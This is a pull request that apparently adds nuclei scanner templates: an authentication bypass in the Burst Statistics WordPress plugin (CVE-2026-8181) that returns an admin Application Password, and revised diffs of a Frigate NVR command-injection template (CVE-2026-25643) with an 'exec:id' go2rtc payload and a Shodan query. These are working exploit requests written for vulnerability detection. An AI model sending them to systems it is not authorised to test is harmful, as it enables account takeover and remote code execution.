### PR TITLE
Add CVE-2026-8181 - Burst Statistics Authentication Bypass to Admin Takeover

### DIFF
--- a/http/cves/2026/CVE-2026-25643.yaml
+++ b/http/cves/2026/CVE-2026-25643.yaml
@@ -1,17 +1,18 @@
 id: CVE-2026-25643
 
 info:
-  name: Frigate NVR - Authenticated RCE via go2rtc exec Injection
+  name: Frigate NVR - Unauthenticated RCE via go2rtc exec Injection
   author: jeongjihyunn
   severity: critical
   description: |
     Frigate NVR versions prior to 0.16.4 are vulnerable to Remote Code Execution
-    via the go2rtc stream configuration. An authenticated attacker (or unauthenticated
-    if the instance is exposed without auth) can inject arbitrary OS commands into
+    via the go2rtc stream configuration. When Frigate is exposed to the internet
+    without authentication, an attacker can inject arbitrary OS commands into
     the config.yaml via the exec: directive, which go2rtc executes without restriction.
   reference:
     - https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x
     - https://nvd.nist.gov/vuln/detail/CVE-2026-25643
+    - https://github.com/joshuavanderpoll/CVE-2026-25643
   classification:
     cve-id: CVE-2026-25643
     cwe-id: CWE-78
@@ -20,21 +21,10 @@ info:
   metadata:
     verified: true
     shodan-query: 'http.title:"Frigate"'
-  tags: cve,cve2026,frigate,rce,injection,authenticated
-
-variables:
-  username: "admin"
-  password: "admin"
+  tags: cve,cve2026,frigate,rce,injection
 
 http:
   - raw:
-      - |
-        POST /api/login HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/json
-
-        {"user":"{{username}}","password":"{{password}}"}
-
       - |
         POST /api/config/save?save_option=reload HTTP/1.1
         Host: {{Hostname}}
@@ -52,14 +42,14 @@ http:
         GET /api/config HTTP/1.1
         Host: {{Hostname}}
 
-    cookie-reuse: true
-
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - "exec:"
+          - "exec:id"
+          - "nuclei_test"
+        condition: and
 
       - type: status
         status:

--- a/http/cves/2026/CVE-2026-25643.yaml
+++ b/http/cves/2026/CVE-2026-25643.yaml
@@ -2,7 +2,7 @@ id: CVE-2026-25643
 
 info:
   name: Frigate NVR - Authenticated RCE via go2rtc exec Injection
-  author: your-github-username
+  author: jeongjihyunn
   severity: critical
   description: |
     Frigate NVR versions prior to 0.16.4 are vulnerable to Remote Code Execution
@@ -22,17 +22,19 @@ info:
     shodan-query: 'http.title:"Frigate"'
   tags: cve,cve2026,frigate,rce,injection,authenticated
 
+variables:
+  username: "admin"
+  password: "admin"
+
 http:
   - raw:
-      # Step 1: Login
       - |
         POST /api/login HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/json
 
-        {"user":"admin","password":"29b66abd5f80c253657c76325b1c1113"}
+        {"user":"{{username}}","password":"{{password}}"}
 
-      # Step 2: Inject exec payload
       - |
         POST /api/config/save?save_option=reload HTTP/1.1
         Host: {{Hostname}}
@@ -46,7 +48,6 @@ http:
               - "exec:id"
         cameras: {}
 
-      # Step 3: Verify injection
       - |
         GET /api/config HTTP/1.1
         Host: {{Hostname}}
@@ -59,7 +60,6 @@ http:
         part: body
         words:
           - "exec:"
-        condition: and
 
       - type: status
         status:

--- a/http/cves/2026/CVE-2026-25643.yaml
+++ b/http/cves/2026/CVE-2026-25643.yaml
@@ -1,0 +1,66 @@
+id: CVE-2026-25643
+
+info:
+  name: Frigate NVR - Authenticated RCE via go2rtc exec Injection
+  author: your-github-username
+  severity: critical
+  description: |
+    Frigate NVR versions prior to 0.16.4 are vulnerable to Remote Code Execution
+    via the go2rtc stream configuration. An authenticated attacker (or unauthenticated
+    if the instance is exposed without auth) can inject arbitrary OS commands into
+    the config.yaml via the exec: directive, which go2rtc executes without restriction.
+  reference:
+    - https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-25643
+  classification:
+    cve-id: CVE-2026-25643
+    cwe-id: CWE-78
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 9.1
+  metadata:
+    verified: true
+    shodan-query: 'http.title:"Frigate"'
+  tags: cve,cve2026,frigate,rce,injection,authenticated
+
+http:
+  - raw:
+      # Step 1: Login
+      - |
+        POST /api/login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"user":"admin","password":"29b66abd5f80c253657c76325b1c1113"}
+
+      # Step 2: Inject exec payload
+      - |
+        POST /api/config/save?save_option=reload HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/plain
+
+        mqtt:
+          enabled: false
+        go2rtc:
+          streams:
+            nuclei_test:
+              - "exec:id"
+        cameras: {}
+
+      # Step 3: Verify injection
+      - |
+        GET /api/config HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "exec:"
+        condition: and
+
+      - type: status
+        status:
+          - 200

--- a/http/cves/2026/CVE-2026-8181.yaml
+++ b/http/cves/2026/CVE-2026-8181.yaml
@@ -1,0 +1,51 @@
+id: CVE-2026-8181
+
+info:
+  name: Burst Statistics <= 3.4.1.1 - Authentication Bypass to Admin Takeover
+  author: jeongjihyunn
+  severity: critical
+  description: |
+    Burst Statistics plugin for WordPress versions 3.4.0 through 3.4.1.1 is vulnerable
+    to authentication bypass. The is_mainwp_authenticated() function calls
+    wp_authenticate_application_password() outside the REST API context, which returns
+    null instead of WP_Error. Since null is not a WP_Error, the check passes and an
+    unauthenticated attacker can mint a WordPress Application Password for any admin account.
+  reference:
+    - https://github.com/Yucaerin/CVE-2026-8181
+    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/burst-statistics/burst-statistics-340-3411-authentication-bypass-to-admin-account-takeover
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-8181
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-8181
+    cwe-id: CWE-287
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: burst-statistics
+    product: burst-statistics
+    tags: cve,cve2026,wordpress,wp-plugin,burst-statistics,auth-bypass
+
+http:
+  - raw:
+      - |
+        POST /?rest_route=/burst/v1/mainwp-auth HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Basic YWRtaW46YW55dGhpbmc=
+        X-BurstMainWP: 1
+        Content-Type: application/json
+
+        {}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"token":'
+          - '"root_url":'
+        condition: and
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### PR Information
Added CVE-2026-8181 - Burst Statistics <= 3.4.1.1 Authentication Bypass to Admin Account Takeover

- References:
https://github.com/Yucaerin/CVE-2026-8181
https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/burst-statistics/burst-statistics-340-3411-authentication-bypass-to-admin-account-takeover
https://nvd.nist.gov/vuln/detail/CVE-2026-8181

### Template validation
- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

### Additional References:

Validated locally using Docker with Burst Statistics 3.4.0 installed on WordPress.
The template sends a single POST request to /?rest_route=/burst/v1/mainwp-auth with X-BurstMainWP: 1 header and arbitrary Basic Auth credentials. Due to improper validation of wp_authenticate_application_password() return value (null is not checked as a non-WP_Error), authentication is bypassed and a WordPress Application Password for the admin account is returned in the response body.
Vulnerable version tested: Burst Statistics 3.4.0
Environment: WordPress + Docker (localhost)

[CVE-2026-8181] [http] [critical] http://localhost:8080/?rest_route=/burst/v1/mainwp-auth
1 matches found.